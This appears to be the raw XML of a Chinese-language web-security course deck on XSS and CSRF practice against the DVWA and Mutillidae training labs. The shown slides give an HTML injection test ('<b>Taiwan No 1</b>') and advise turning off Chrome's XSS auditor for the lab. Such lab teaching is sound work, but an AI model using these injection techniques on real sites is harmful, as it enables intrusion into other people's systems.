      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="圖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1143" y="1577673"/>
            <a:ext cx="7016069" cy="5208759"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3395196" y="4137025"/>
            <a:ext cx="3547766" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>受CSRF攻擊，需使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0" smtClean="0"/>
              <a:t>密碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1350" dirty="0" err="1"/>
              <a:t>xssattack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0" smtClean="0"/>
              <a:t>才能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1350" dirty="0"/>
              <a:t>登入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1023850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65126"/>
            <a:ext cx="9144000" cy="1010593"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>延伸練習   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>你可以多加練習練習更多範例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploitation@OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>II(2.6.48</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>版</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="201474" y="1568832"/>
            <a:ext cx="8435169" cy="4930822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32161293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142875" y="-57150"/>
            <a:ext cx="92868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800" dirty="0" smtClean="0"/>
              <a:t>Reflected Cross Site Scripting exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
              <a:t>in DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>實務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="5400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1754513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398079"/>
            <a:ext cx="9144000" cy="763458"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:body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endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="內容版面配置區 5"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="784148" y="1800124"/>
            <a:ext cx="7432401" cy="4312352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="向右箭號 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5272216"/>
            <a:ext cx="840259" cy="766119"/>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mtClean="0"/>
              <a:t>點選</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="圓角矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6507893" y="3029829"/>
            <a:ext cx="1647568" cy="833716"/>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kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>正</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>常</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US"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rPr>
              <a:t>輸入   </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW"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rPr>
              <a:t>Taiwan No 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形圖說文字 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4135394" y="3496962"/>
            <a:ext cx="2084174" cy="366583"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44579"/>
              <a:gd name="adj2" fmla="val -10767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要輸入你的名字</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="圓角矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6507893" y="4154294"/>
            <a:ext cx="1647568" cy="833716"/>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lang="zh-TW" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>正常</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US"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rPr>
              <a:t>輸入   </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW"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lang="zh-TW" altLang="en-US" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>會怎</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>樣</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="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2380351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628650" y="1807181"/>
            <a:ext cx="7854477" cy="2830722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7"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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>輸入      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Taiwan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13451693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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1035305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>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TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>DVWA_1.10_low</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>不正常輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>輸入一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>語法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;b&gt;Taiwan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>1&lt;/b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="666552" y="2043356"/>
            <a:ext cx="7624655" cy="2849920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="橢圓 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1556951" y="4184822"/>
            <a:ext cx="1037968" cy="403654"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:no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圖說文字 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487826" y="4709984"/>
            <a:ext cx="2084174" cy="366583"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44579"/>
              <a:gd name="adj2" fmla="val -107677"/>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變成是   粗體字</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6755927" y="5787509"/>
            <a:ext cx="721672" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1845228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426</TotalTime>
  <Words>1611</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>201</Paragraphs>
  <Slides>45</Slides>
  <Notes>2</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45</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="52" baseType="lpstr">
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>Web Hacking and Exploitation_2_2                 XSS and CSRF Attacks 實務測試  XSS==Cross Site Scripting  CSRF==Cross-site request forgery</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>XSS==Cross Site Scripting </vt:lpstr>
      <vt:lpstr>Types of Cross-Site Scripting類型 https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting</vt:lpstr>
      <vt:lpstr>延伸練習   [你可以多加練習練習更多範例] XSS exploitation@OWASP Mutillidae II(2.6.48版)</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_low</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>1.直接安裝Firefox，不會擋XSS Attack https://www.mozilla.org/zh-TW/firefox/new/</vt:lpstr>
      <vt:lpstr>2. google chrome::關閉xss auditor</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_low</vt:lpstr>
      <vt:lpstr>DEMO::DVWA_1.10_low 正常輸入</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CSRF exploitation</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Hacking and Exploitation_2</dc:title>
  <dc:creator>ksu</dc:creator>
  <cp:lastModifiedBy>ksu</cp:lastModifiedBy>
  <cp:revision>94</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-10T06:18:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-13T10:31:43Z</dcterms:modified>
</cp:coreProperties>
</file>